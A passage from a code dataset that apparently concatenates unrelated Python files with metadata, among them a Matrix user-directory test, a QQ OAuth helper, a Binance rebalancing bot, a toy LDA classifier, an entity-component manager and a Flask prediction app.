hs = yield setup_test_homeserver(self.addCleanup)\n self.store = hs.get_datastore()\n hs.handlers = UserDirectoryHandlers(hs)\n\n self.handler = hs.get_handlers().user_directory_handler\n\n @defer.inlineCallbacks\n def test_handle_local_profile_change_with_support_user(self):\n support_user_id = \"@support:test\"\n yield self.store.register(\n user_id=support_user_id,\n token=\"123\",\n password_hash=None,\n user_type=UserTypes.SUPPORT\n )\n\n yield self.handler.handle_local_profile_change(support_user_id, None)\n profile = yield self.store.get_user_in_directory(support_user_id)\n self.assertTrue(profile is None)\n display_name = 'display_name'\n\n profile_info = ProfileInfo(\n avatar_url='avatar_url',\n display_name=display_name,\n )\n regular_user_id = '@regular:test'\n yield self.handler.handle_local_profile_change(regular_user_id, profile_info)\n profile = yield self.store.get_user_in_directory(regular_user_id)\n self.assertTrue(profile['display_name'] == display_name)\n\n @defer.inlineCallbacks\n def test_handle_user_deactivated_support_user(self):\n s_user_id = \"@support:test\"\n self.store.register(\n user_id=s_user_id,\n token=\"123\",\n password_hash=None,\n user_type=UserTypes.SUPPORT\n )\n\n self.store.remove_from_user_dir = Mock()\n self.store.remove_from_user_in_public_room = Mock()\n yield self.handler.handle_user_deactivated(s_user_id)\n self.store.remove_from_user_dir.not_called()\n self.store.remove_from_user_in_public_room.not_called()\n\n @defer.inlineCallbacks\n def test_handle_user_deactivated_regular_user(self):\n r_user_id = \"@regular:test\"\n self.store.register(user_id=r_user_id, token=\"123\", password_hash=None)\n self.store.remove_from_user_dir = Mock()\n self.store.remove_from_user_in_public_room = Mock()\n yield self.handler.handle_user_deactivated(r_user_id)\n self.store.remove_from_user_dir.called_once_with(r_user_id)\n self.store.remove_from_user_in_public_room.assert_called_once_with(r_user_id)\n","sub_path":"tests/handlers/test_user_directory.py","file_name":"test_user_directory.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"530956227","text":"\nfrom django.conf import settings\nfrom urllib.parse import urlencode,parse_qs\nfrom urllib.request import urlopen\nimport logging\nfrom .exceptions import QQAPIException\nimport json\n\nlogger = logging.getLogger(\"django\")\nclass OAuthQQ():\n \"\"\"\n 用户QQ登陆的工具类\n 提供了QQ登陆可能使用的方法\n \"\"\"\n def __init__(self,app_id=None,app_key=None,redirect_url=None,state=None):\n self.app_id= app_id or settings.QQ_APP_ID\n self.app_key = app_key or settings.QQ_APP_KEY\n self.redirect_url = redirect_url or settings.QQ_REDIRECT_URL\n self.state = state or settings.QQ_STATE\n\n\n def generate_qq_login_url(self):\n \"\"\"\n 获取qq登录的网址\n :return: url网址\n \"\"\"\n params ={\n 'response_type':'code',\n 'client_id':self.app_id,\n 'redirect_uri':self.redirect_url,\n 'state':self.state,\n 'scope':'get_user_info' # 获取用户的信息\n }\n\n url = \"https://graph.qq.com/oauth2.0/authorize?\"+urlencode(params)\n print(url)\n return url\n\n def get_access_token(self,code):\n \"\"\"\n 获取qq的access_token\n :param code: 调用的凭证\n :return: 返回access_token\n \"\"\"\n url = \"https://graph.qq.com/oauth2.0/token?\"\n req_data = {\n \"grant_type\":\"authorization_code\",\n \"client_id\":self.app_id,\n \"client_secret\":self.app_key,\n \"code\":code,\n \"redirect_uri\":self.redirect_url\n }\n url += urlencode(req_data)\n try:\n # 发送请求,读取qq返回的数据\n response = urlopen(url)\n response = response.read().decode()\n\n # 将返回的数据转换为字典\n resp_dict = parse_qs(response)\n\n access_token = resp_dict.get(\"access_token\")[0]\n except Exception as e:\n logger.error(e)\n raise QQAPIException(\"获取acess_token异常\")\n return access_token\n\n def get_openid(self,access_token):\n \"\"\"\n 获取qq的openid\n :param access_token: 调用的凭证\n :return: 返回openid\n \"\"\"\n url = \"https://graph.qq.com/oauth2.0/me?access_token=\"+access_token\n try:\n # 发送请求,读取qq返回的数据\n response = urlopen(url)\n response_data = response.read().decode()\n\n # 将返回的数据转换为字典\n data = json.loads(response_data[10:-4])\n\n except Exception:\n data = parse_qs(response_data)\n logger.error(\"code=%s msg=%s\" % (data.get('code'),data.get('msg')))\n raise QQAPIException(\"获取openid异常\")\n\n\n openid = data.get(\"openid\",None)\n return openid","sub_path":"meiduo_mall/meiduo_mall/apps/oauth/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"279785979","text":"\"\"\"makeidentifier -- Convert AppleScript keywords to Python identifiers.\n\n(C) 2004 HAS\n\"\"\"\n\nimport keyword, string\n\n# NOTE: 'filter' is deprecated as reserved word; TO DO: remove 'filter' from list of reserved words in next release\n\n######################################################################\n# PRIVATE\n######################################################################\n# Reserved names of identifiers used in Specifier and Test classes\n\n# IMPORTANT: reserved words and prefix defined here must match reserved function and property names defined in appscript.specifier classes and method keyword args\n\n_reservedPrefix = 'AS_'\n\n_reservedWords = \"\"\"\n\t\ttimeout waitreply resulttype ignore telltarget\n\t\tfilter\n\t\tID previous next\n\t\tstart end before after\n\t\tfirst last middle any\n\t\tstartswith endswith contains isin\n\t\tdoesnotstartwith doesnotendwith doesnotcontain isnotin\n\t\tAND OR NOT\n\t\tstarttransaction endtransaction\n\t\thelp\n\t\t\"\"\".split()\n\n# Special conversions for selected characters in AppleScript keywords; makes appscript users' lives easier. Note this is a lossy conversion, but chances of this causing name collisions are very low unless application developers are very stupid in choosing keyword names in their dictionaries. (Mind, this wouldn't have been a problem had Apple restricted them all to using only alphanumeric and space characters to begin with, which would've allowed simple, unambiguous conversion to C-style identifiers and back.)\n\n_specialConversions = {\n\t\t' ': '_',\n\t\t'-': '_',\n\t\t'&': 'and',\n\t\t'/': '_',\n\t\t}\n\n_cache = {}\n\n_legalChars = string.ascii_letters + '_'\n_alphanum = _legalChars + string.digits\n\n######################################################################\n# PUBLIC\n######################################################################\n\ndef convert(s):\n\t\"\"\"Convert unicode string to Python identifier.\n\t\ts : string or unicode\n\t\tResult : string\n\t\"\"\"\n\tif not _cache.has_key(s):\n\t\tlegal = _legalChars\n\t\tres = ''\n\t\tfor c in s:\n\t\t\tif c in legal:\n\t\t\t\tres += c\n\t\t\telif _specialConversions.has_key(c):\n\t\t\t\tres += _specialConversions[c]\n\t\t\telse:\n\t\t\t\tif res == '':\n\t\t\t\t\tres = '_' # avoid creating an invalid identifier\n\t\t\t\tres += '0x%2.2X' % ord(c)\n\t\t\tlegal = _alphanum\n\t\tif keyword.iskeyword(res) or res in _reservedWords or res.startswith('_') or res.startswith(_reservedPrefix):\n\t\t\tres += '_'\n\t\t_cache[s] = str(res)\n\treturn _cache[s]\n","sub_path":"py-appscript/tags/py-appscript-0.16.2/Lib/osaterminology/makeidentifier.py","file_name":"makeidentifier.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"124548851","text":"from binance.account import account\nimport binance.market as market\nfrom data.candles import candleLoader\nfrom portfolioManagement.portfolioManagement import MAMRPortfolioManager\nimport pickle\n\nimport datetime\nimport numpy as np\n\nMAMR_MGR = 'data.pkl'\nBINANCE_BOT = 'bot.pkl'\n\n#Currencies to Include in selection\nCURRENCIES = ['ETH', 'EOS', 'FTT', 'LTC', 'BCH', 'ADA']\n#Quote Assets\nQUOTES = ['BTC', 'BNB']\nRISKLESS = 'USDT'\n\n\nDATABASE = 'data/candles_12h.db'\n\nclass binanceBot:\n\tdef __init__(self, api, secret, saved=None, n=26):\n\t\tself.account = account(api, secret)\n\t\tself.balances = np.array([self.account.balances[c] if c in self.account.balances else 0.0 for c in [RISKLESS] + QUOTES + CURRENCIES])\n\n\t\t\n\n\t\tif saved is not None:\n\t\t\ttry:\n\t\t\t\twith open(saved, 'rb') as file:\n\t\t\t\t\tloaded = pickle.load(file)\n\t\t\t\t\tself.manager = loaded.manager\n\t\t\t\t\tself.prices = loaded.prices\n\t\t\t\t\tself.returns = loaded.returns\n\t\t\t\t\tself.update_times = loaded.update_times\n\t\t\t\t\tself.portfolio = np.array(loaded.portfolio)\n\t\t\t\t\treturn\n\n\t\t\texcept FileNotFoundError:\n\t\t\t\tpass\n\n\t\t#get the portfolio...\n\t\tself.manager = MAMRPortfolioManager(len(CURRENCIES) + len(QUOTES) + 1, 4.105, 9.5, 1000, 0.0, n)\n\t\t\n\n\t\tfrom data.get_candles_spot import main as get_candles\n\t\tget_candles()\n\n\t\t\n\n\t\tprice_changes = []\n\t\ttimes = []\n\t\tself.prices = []\n\t\t\n\t\tfor candle in candleLoader(DATABASE):\n\t\t\t#consider markets trading against BTC, so we need to invert the USDT price\n\t\t\tself.prices.append(np.array([1] + [candle[currency + 'USDT_OPEN'] for currency in QUOTES + CURRENCIES]))\n\t\t\tif len(self.prices) == 1:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprice_changes.append(self.prices[-1] / self.prices[-2])\n\t\t\t\ttimes.append(candle['open_time'])\n\n\t\tfor change, time in zip(price_changes[-n:], times[-n:]):\n\t\t\tself.manager.update(time, change)\n\n\n\t\tself.returns = price_changes\n\t\tself.update_times = times\n\t\tself.portfolio = self.account.get_portfolio_weighted(['USDT'] + QUOTES + CURRENCIES)\n\t\t\n\t\tself.manager.portfolio = np.array(self.portfolio)\n\t\tself.prices.append(np.array([1.05 ** (0.5 / 365)] + [np.mean(market.prices([a + 'USDT' for a in QUOTES + CURRENCIES])[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\n\tdef save(self, location):\n\t\twith open(location, 'wb') as file:\n\t\t\tpickle.dump(self, file)\n\n\tdef update(self):\n\t\tmarket_prices =market.prices([a + 'USDT' for a in QUOTES + CURRENCIES])\n\t\t#self.prices.append(np.array([1.05 ** (0.5 / 365)] + [np.mean(market_prices[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\t\tself.prices.append(np.array([1] + [np.mean(market_prices[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\t\treturns = self.prices[-1] / self.prices[-2]\n\t\treturns[0] = 1.05 ** (0.5 / 365) #should get realtime returns\n\n\t\tself.returns.append(returns)\n\t\tself.update_times.append(int(datetime.datetime.now().timestamp() * 1000))\n\t\tusd_balances = self.balances * self.prices[-1]\n\n\t\tself.manager.update(self.update_times[-1], self.returns[-1])\n\n\t\t\n\t\ttarget_portfolio = np.array(self.manager.portfolio)\n\t\t#swutch bnb abd usdt to get fee reductions\n\t\tusdt_proportion = target_portfolio[0]\n\t\ttarget_portfolio[0] = target_portfolio[2]\n\t\ttarget_portfolio[2] = usdt_proportion\n\t\t\n\t\t#The prices in BNB will be aquired in the trade method, maybe should just get these originally... \n\t\tself.account.trade_to_portfolio('BNB', ['BNB', 'BTC', 'USDT'], CURRENCIES, target_portfolio)\n\n\n\t\tself.portfolio = self.account.get_portfolio_weighted(['USDT'] + QUOTES + CURRENCIES)\n\t\tprint(self.portfolio, self.manager.portfolio)\n\t\t\n\t\twith open('output.txt', 'a') as file:\n\t\t\tfile.write(str(self.manager.portfolio) + str(self.portfolio))\n\n\ndef main():\n\n\n\ttry:\n\t\timport keys\n\texcept ModuleNotFoundError:\n\t\tprint('keys.py file missing - see readme for set up instructions')\n\t\treturn \n\n\tbot = binanceBot(keys.API, keys.SECRET, 'state.pkl')\n\t\n\tbot.update()\n\tbot.save('state.pkl')\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"221012306","text":"#!/usr/bin/env python\n#coding=utf-8\nimport numpy as np\nfrom scipy import linalg\n\n'''\n@author: FreeMind\n@version: 1.0\nCreated on 2014/3/9\nA toy implementation of Linear Discriminant Analysis(LDA) algorithm\n'''\n\nclass LDA:\n def __init__(self,test_data,targetDim):\n self.testData = test_data\n #Retrieve the class number of the test_data\n self.classSet = set([sample[-1] for sample in test_data])\n self.classNum = len(self.classSet)\n #Get the size of the training set\n self.sampleSize = len(test_data)\n #Get the dimension of the data\n self.dim = len(test_data[1])-1\n #Set the target dimension\n self.targetDim = targetDim\n \n #Train for the LDA algorithm\n def train(self):\n #Separate the data according to the classSet\n dict_sample = {} \n dict_count = {}\n meanList = {} \n totalMean = np.zeros(self.dim)\n for sample in self.testData:\n if sample[-1] not in dict_sample.keys():\n dict_sample[sample[-1]] = [sample[:-1]]\n dict_count[sample[-1]] = 1\n else:\n dict_sample[sample[-1]].append(sample[:-1])\n dict_count[sample[-1]] +=1\n if sample[-1] not in meanList.keys():\n meanList[sample[-1]] = []\n for i in range(self.dim):\n meanList[sample[-1]].append(sample[i])\n else:\n for i in range(self.dim):\n meanList[sample[-1]][i] += sample[i]\n for key in dict_count.keys():\n for i in range(self.dim):\n totalMean[i] += meanList[key][i]\n meanList[key][i] /= dict_count[key] \n for i in range(self.dim):\n totalMean[i] /= self.sampleSize\n #Calculate the scatter matrix\n Sb = np.zeros([self.dim,self.dim])\n Sw = np.zeros([self.dim,self.dim])\n for key in dict_count.keys():\n tempArray = np.array(meanList[key])-np.array(totalMean)\n tempArray.shape = (self.dim,1)\n Sb += dict_count[key]*np.dot(tempArray,np.transpose(tempArray))\n for sample in self.testData:\n tempArray = np.array(meanList[sample[-1]])-np.array(sample[:-1])\n tempArray.shape=(self.dim,1)\n Sw+=np.dot(tempArray,np.transpose(tempArray))\n matrixFinal = np.dot(linalg.inv(Sw),Sb)\n eigenValue,eigenVector = linalg.eig(matrixFinal)\n print(eigenValue)\n print(eigenVector)\n \n #predict using the LDA algorithm\n def predict(self,predict_data):\n pass\n \n\n\n#Test case\nif __name__ == \"__main__\":\n test_data =[[2.95,6.63,\"Qualified\"],[2.53,7.79,\"Qualified\"],[3.57,5.65,\"Qualified\"],\n [3.16,5.47,\"Qualified\"],[2.58,4.46,\"Unqualified\"],\n [2.16,6.22,\"Unqualified\"],[3.27,3.52,\"Unqualified\"]]\n lda = LDA(test_data,1)\n lda.train()\n #lda.predict([[2.81,5.46]])\n \n ","sub_path":"ml/classfication/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"328863276","text":"\n#int sum = 0;\n\nsumO = 0\nwhile True :\n read = int(input())\n if (read == 0) :\n break\n \n\n # do something here\n sumO = sumO + read\n\n print(\"Sum now: \" + str(sumO))\n\n\nprint(\"Sum in the end: \" + str(sumO))\n","sub_path":"Python/Week 2/SumOfManyNumbers.py","file_name":"SumOfManyNumbers.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"542325229","text":"from metis.core.query import ExecutableNode\nfrom metis.core.query.aggregate import Aggregator\nfrom metis.core.query.aggregate import GroupBy\nfrom metis.core.query.condition import Condition\nfrom metis.core.query.stream import Stream\nfrom metis.core.query.value import Value\nfrom metis.utils.enum import Enum\n\n\ndef _parse_stream_or_transform(_dict):\n if not _dict:\n return None\n typ = _dict['type']\n if typ in Stream.Type.values():\n return Stream.parse(_dict)\n assert typ in Transform.Type.values()\n return Transform.parse(_dict)\n\n\nclass Transform(ExecutableNode):\n class Type(Enum):\n PROJECT = 'project'\n FILTER = 'filter'\n ORDER_BY = 'order_by'\n LIMIT = 'limit'\n AGGREGATE = 'aggregate'\n JOIN = 'join'\n\n def __init__(self, alias=None):\n self.alias = alias\n\n def validate(self):\n return self.type in Transform.Type.values()\n\n @classmethod\n def parse(self, _dict):\n typ = _dict['type']\n\n if typ in Stream.Type.values():\n return Stream.parse(_dict)\n\n assert typ in Transform.Type.values()\n del _dict['type']\n\n if 'stream' in _dict:\n _dict['stream'] = _parse_stream_or_transform(_dict['stream'])\n\n if typ == Transform.Type.PROJECT:\n return Project.parse(_dict)\n if typ == Transform.Type.FILTER:\n return Filter.parse(_dict)\n if typ == Transform.Type.ORDER_BY:\n return OrderBy.parse(_dict)\n if typ == Transform.Type.LIMIT:\n return Limit.parse(_dict)\n if typ == Transform.Type.AGGREGATE:\n return Aggregate.parse(_dict)\n if typ == Transform.Type.JOIN:\n return Join.parse(_dict)\n\n\nclass Project(Transform):\n def __init__(self, stream, fields, merge=False, **kwargs):\n self.type = Transform.Type.PROJECT\n self.stream = stream\n self.fields = fields\n self.merge = merge\n super(Project, self).__init__(**kwargs)\n\n @classmethod\n def parse(self, _dict, **kwargs):\n _dict['fields'] = map(Value.parse, _dict['fields'])\n return Project(**_dict)\n\n\nclass Filter(Transform):\n def __init__(self, stream, condition, **kwargs):\n self.type = Transform.Type.FILTER\n self.stream = stream\n self.condition = condition\n super(Filter, self).__init__(**kwargs)\n\n @classmethod\n def parse(self, _dict):\n _dict['condition'] = Condition.parse(_dict['condition'])\n return Filter(**_dict)\n\n\nclass OrderBy(Transform):\n def __init__(self, stream, fields, reverse=False, **kwargs):\n self.type = Transform.Type.ORDER_BY\n self.stream = stream\n self.fields = fields\n self.reverse = reverse\n super(OrderBy, self).__init__(**kwargs)\n\n @classmethod\n def parse(self, _dict):\n _dict['fields'] = map(Value.parse, _dict['fields'])\n return OrderBy(**_dict)\n\n\nclass Limit(Transform):\n def __init__(self, stream, limit, **kwargs):\n self.type = Transform.Type.LIMIT\n self.stream = stream\n self.limit = limit\n super(Limit, self).__init__(**kwargs)\n\n @classmethod\n def parse(self, _dict):\n return Limit(**_dict)\n\n\nclass Aggregate(Transform):\n def __init__(self, stream, group_by, aggregates, **kwargs):\n self.type = Transform.Type.AGGREGATE\n self.stream = stream\n self.aggregates = aggregates\n self.group_by = group_by\n super(Aggregate, self).__init__(**kwargs)\n \n @classmethod\n def parse(self, _dict):\n _dict['aggregates'] = map(Aggregator.parse, _dict['aggregates'])\n _dict['group_by'] = GroupBy.parse(_dict['group_by'])\n return Aggregate(**_dict)\n\n\nclass Join(Transform):\n def __init__(self, left, right, condition, **kwargs):\n self.type = Transform.Type.JOIN\n self.left = left\n self.right = right\n self.condition = condition\n super(Join, self).__init__(**kwargs)\n\n @classmethod\n def parse(self, _dict):\n _dict['left'] = _parse_stream_or_transform(_dict['left'])\n _dict['right'] = _parse_stream_or_transform(_dict['right'])\n _dict['condition'] = Condition.parse(_dict['condition'])\n return Join(**_dict)\n","sub_path":"metis/metis/core/query/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"236860621","text":"\nalgorithm = input(\"Choose the algorithm you want the classification to use: press '1' for the bayes algorithm\")\nwhile():\n if(algorithm==1):\n print(\"1\")\n elif(algorithm==2):\n print(\"2\")\n elif(algorithm==3):\n print(\"3\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"81722679","text":"\n'''\nCreated on 2013-11-02\n\n@author: Nich\n'''\n\n\n#from objects.components import components\n\n\n#from room.room_components import room_components\n\n#all_components = {}\n# all_components.update(components)\n# all_components.update(room_components)\n\n\n\nclass ArrayComponentSource():\n\n def __init__(self, component_list):\n self.component_list = component_list\n self.component_object = {}\n\n for comp_name in component_list.keys():\n self.component_object[comp_name] = {}\n\n def get_component(self, entity_id, component_name):\n if self.has_entity(component_name, entity_id):\n return self.component_object[component_name][entity_id]\n else:\n raise AttributeError(\n \"{0} has no component named {1}\".format(entity_id, component_name))\n\n def get_supported_subset(self, component_list):\n return list(filter(self.has, component_list))\n\n def remove_component(self, entity_id, component_name):\n if self.has_entity(component_name, entity_id):\n self.component_object[component_name].pop(entity_id)\n\n def remove_all_components(self, entity_id):\n for comp in self.component_list:\n self.remove_component(entity_id, comp)\n\n def has(self, component_name):\n return component_name in self.component_list\n\n def get_entities_for_component(self, component_name):\n return list(self.component_object[component_name].keys())\n\n def create_component_data(self, component_name, entity_id, data):\n component = self.component_list[component_name]\n if data is None:\n self.component_object[component_name][\n entity_id] = component(entity_id)\n else:\n self.component_object[component_name][\n entity_id] = component(entity_id, **data)\n\n def has_entity(self, component_name, entity_id):\n return self.has(component_name) and entity_id in self.component_object[component_name]\n\n def add_component_to_object(self, component_name, entity_id, data):\n if not self.has_entity(component_name, entity_id):\n self.create_component_data(component_name, entity_id, data)\n # object.components.add(component_name)\n else:\n raise AttributeError(\n \"Can't add a component more than once to the same object\")\n\n def get_entities_with_components(self, component_list, entity_ids=None):\n entities = [] if entity_ids == None else [entity_ids]\n for component_name in component_list:\n entities.append(self.get_entities_for_component(component_name))\n\n if len(entities) == 0:\n return []\n\n e_list = set(entities[0])\n for e in entities[1:]:\n e_list = e_list.intersection(set(e))\n\n return e_list\n\n def get_component_for_entities(self, entity_ids, component_name):\n components = []\n for e_id in entity_ids:\n\n if self.has_entity(component_name, e_id):\n\n components.append(self.component_object[component_name][e_id])\n\n return components\n\n def create_entity(self):\n return Entity()\n\n\nclass ComponentManager(object):\n\n def __init__(self, component_sources=None):\n self.component_sources = component_sources\n\n def get_component(self, entity_id, component_name):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n return component_source.get_component(entity_id, component_name)\n\n def entity_has_component(self, entity_id, component_name):\n return any([s.has_entity(component_name, entity_id) for s in self.component_sources])\n\n def has_component(self, component_name):\n return any([cs.has(component_name) for cs in self.component_sources])\n\n def remove_component(self, component_name, entity_id):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n component_source.remove_component(entity_id, component_name)\n break\n else:\n raise AttributeError(\"Component not found\")\n\n def remove_all_components(self, entity_id):\n for component_source in self.component_sources:\n component_source.remove_all_components(entity_id)\n\n def add_component_to_object(self, component_name, entity_id, data=None):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n component_source.add_component_to_object(\n component_name, entity_id, data)\n break\n else:\n raise AttributeError(component_name + \" was not found in sources\")\n\n def create_entity(self, entity_spec):\n\n entity = self.component_sources[0].create_entity()\n\n for component_name, component_data in entity_spec.items():\n self.add_component_to_object(\n component_name, entity.id, component_data)\n\n return entity\n\n def get_entities_for_component(self, component_name):\n entities = []\n for component_source in self.component_sources:\n if component_source.has(component_name):\n entities = component_source.get_entities_for_component(\n component_name)\n break\n return entities\n\n def get_entities_with_components(self, component_list, entity_ids):\n entities_from_sources = []\n components_covered = []\n num_components_from_source = []\n\n for component_source in self.component_sources:\n supported_components = component_source.get_supported_subset(\n component_list)\n entities_from_sources.append(\n component_source.get_entities_with_components(supported_components, entity_ids=entity_ids))\n components_covered += supported_components\n num_components_from_source.append(len(supported_components))\n\n if sorted(components_covered) != sorted(component_list):\n raise AttributeError(\"One or more components not found in one of the lists. Got: \" +\n str(components_covered) + \" Expected: \" + str(component_list))\n\n # If a source doesn't provide any entities, don't count that as empty when considering if entities should be returned\n # To do that, filter them from the lists of sources (those sources\n # should return 0 entities regardless)\n entities_from_sources = [\n es for i, es in enumerate(entities_from_sources) if num_components_from_source[i] > 0]\n\n entities = entities_from_sources[0]\n for entity_list in entities_from_sources[1:]:\n if entity_list != []:\n entities = list(set(entities).intersection(set(entity_list)))\n\n return entities\n\n def get_components_for_entities(self, entity_ids, component_name):\n components = []\n for component_source in self.component_sources:\n if component_source.has(component_name):\n components += component_source.get_component_for_entities(\n entity_ids, component_name)\n\n return components\n","sub_path":"Engine/components/component_manager.py","file_name":"component_manager.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244386223","text":"import os\n\nwith open(\"file_name_list.txt\",\"w\") as f:\n\tfor curdir, dirs, files in os.walk('./gachon_python_class'):\n\t\tf.write(\"Current Directory :\" + curdir + \"\\n\")\n\n\t\tif len(dirs):\n\t\t\tf.write(\"Directory List\" + \"\\n\")\n\t\t\tdirlist = \"\"\n\t\t\tfor dir in dirs:\n\t\t\t\tdirlist = dirlist + dir + \"\\t\" + str(len(files)) + \"\\n\"\n\t\t\tf.write(dirlist+\"\\n\")\n\n\t\tif len(files):\n\t\t\tf.write(\"File List List\" + \"\\n\")\n\t\t\tfilelist = \"\"\n\t\t\tfor file in files:\n\t\t\t\tfilelist = filelist + file + \"\\t\" + str(os.path.getsize (curdir+\"/\"+file))+\"KB\" + \"\\n\"\n\t\t\tf.write(filelist+\"\\n\")\n\n\t\tf.write((\"-\"*60)+\"\\n\")\n","sub_path":"lecture/w11_files/write_file.py","file_name":"write_file.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"74731631","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('oscar_pred.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n\r\n init_features = [float(x) for x in request.form.values()]\r\n final_features = [np.array(init_features)]\r\n\r\n prediction = model.predict(final_features)\r\n\r\n return render_template('index.html', prediction_text='Prediction: {}'.format(prediction))\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=4000, debug=True)\r\n\r\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172696293","text":"from numpy import array,linspace, pi, arange, sin, cos, ones, frompyfunc, where, hstack\nfrom enthought.chaco.api import create_polar_plot\nfrom enthought.enable.example_support import DemoFrame, demo_main\n\n# Enthought library imports\nfrom enthought.enable.api import Window\nfrom enthought.traits.api import false\nfrom enthought.traits.api import Delegate\nfrom enthought.traits.api import Array, Bool, Callable, Enum, Float, HasTraits, \\\n Instance, Int, Trait, ToolbarButton, Button, on_trait_change, \\\n Property, cached_property, Range, Instance, List\nfrom enthought.traits.ui.api import *\n\nfrom enthought.traits.ui.menu import NoButtons, OKButton, CancelButton, Action, CloseAction, Menu, \\\n MenuBar, Separator\nfrom enthought.enable.component_editor import ComponentEditor\nfrom enthought.chaco.example_support import DemoFrame, demo_main, COLOR_PALETTE\nfrom enthought.chaco.api import HPlotContainer, create_line_plot, add_default_axes, \\\n add_default_grids, OverlayPlotContainer, \\\n PlotLabel, VPlotContainer, \\\n create_scatter_plot, Legend, PlotComponent\nfrom enthought.chaco.tools.api import PanTool, RectZoomTool, SimpleZoom, \\\n LegendTool, TraitsTool, DragZoom\nfrom mfn_polar_editor import MFnPolarPlotItem\nimport enthought.units as units\nfrom enthought.units.angle import degree, radian\n\nimport time, sys\nimport math\n \n# function to be plotted\ndef radius_fn( theta, alpha, delta_alpha, delta_trans, strech_residual, strech_quasibrittle):\n \n #1st quadrant\n if ((theta-alpha) >= 0. and (theta-alpha) <= (pi/2)):\n theta_tilde = theta-alpha \n #2nd quadrant \n elif ((theta-alpha) <= pi and (theta-alpha) >= pi/2):\n theta_tilde = pi-(theta-alpha) \n #3rd quadrant positive\n elif ((theta-alpha) >= pi and (theta-alpha) <= 3*pi/2):\n theta_tilde = theta-alpha-pi\n #3rd quadrant negative \n elif ((theta-alpha) >= -pi and (theta-alpha) <= -pi/2):\n theta_tilde = theta-alpha+pi\n #4th quadrant positive\n elif ((theta-alpha) <= 2*pi and (theta-alpha) >= 3*pi/2):\n theta_tilde = (2*pi)-(theta-alpha)\n #4th quadrant negative \n elif ((theta-alpha) <= 0. and (theta-alpha) >= -pi/2):\n theta_tilde = -(theta-alpha)\n\n ### Definition of function to be plotted in the range of 0 and Pi/2:\n phi_residual = 0.65\n phi_quasibrittle = - 0.25\n _phi_residual = phi_residual + (1-phi_residual) * strech_residual\n _phi_quasibrittle = phi_quasibrittle + (1-phi_quasibrittle) * strech_quasibrittle\n \n # constant values with linear transition function:\n # (for delta_alpha = 0 the transition function is evaluated)\n if abs(theta_tilde) < delta_alpha:\n radius_fn = _phi_residual \n elif abs(theta_tilde) >= delta_alpha and abs(theta_tilde) < delta_alpha+delta_trans:\n radius_fn = (_phi_residual - \\\n ((theta_tilde-delta_alpha)*(_phi_residual - _phi_quasibrittle)/(delta_trans)))\n else:\n radius_fn = _phi_quasibrittle\n \n return radius_fn\n\nvradius_fn = frompyfunc( radius_fn, 6, 1 )\n\nclass MFnWTHandler( Handler ):\n def open_data( self, info ):\n sys.exit(0)\n #info.object.print_data()\n# dlg = FileDialog(parent=self.control, wildcard=\"*.jpg\")\n\n# if dlg.open() == OK:\n# self._editor.path = dlg.path\n\n \n def save_file(self,info):\n sys.exit(0)\n # if self.control:\n# try:\n# self._editor.save()\n# except IOError, e:\n# # If you are trying to save to a file that doesn't exist,\n# # open up a FileDialog with a 'save as' action.\n# dlg = FileDialog(parent=self.control, action='save as', wildcard=\"*.jpg\")\n# if dlg.open() == OK:\n# self._editor.save(dlg.path)\n\n\n def exit_file(self,info):\n sys.exit(0)\n\n def init_file(self, window):\n \"\"\" Creates a new action. \"\"\"\n# self._window = window\n# self.name = \"E&xit\"\n self.menu_bar_manager = MenuBarManager(MenuManager(\n Action(name='&Open...', on_perform=self._open_file),\n Action(name='&Save', on_perform=self._save_file),\n Action(name='E&xit', on_perform=self.close),\n name='&File'))\n\n\n def perform(self):\n \"\"\" Performs the action. \"\"\"\n self._window.close()\n\nclass MFnPolar(HasTraits):\n\n numpoints = Int(80)\n low = Float(0.)\n high = Float(2*pi)\n\n alpha = Range( 0., pi , 0., auto_set = False)\n delta_alpha = Range( 0., pi/2, 0., auto_set = False)\n delta_trans = Range( 0., pi , 0., auto_set = False)\n plotrange_min = Float( 0.)\n plotrange_max = Float( 1.)\n frac_noplot = Range( 0., 1 , 0.3, auto_set = False)\n strech_residual = Range( 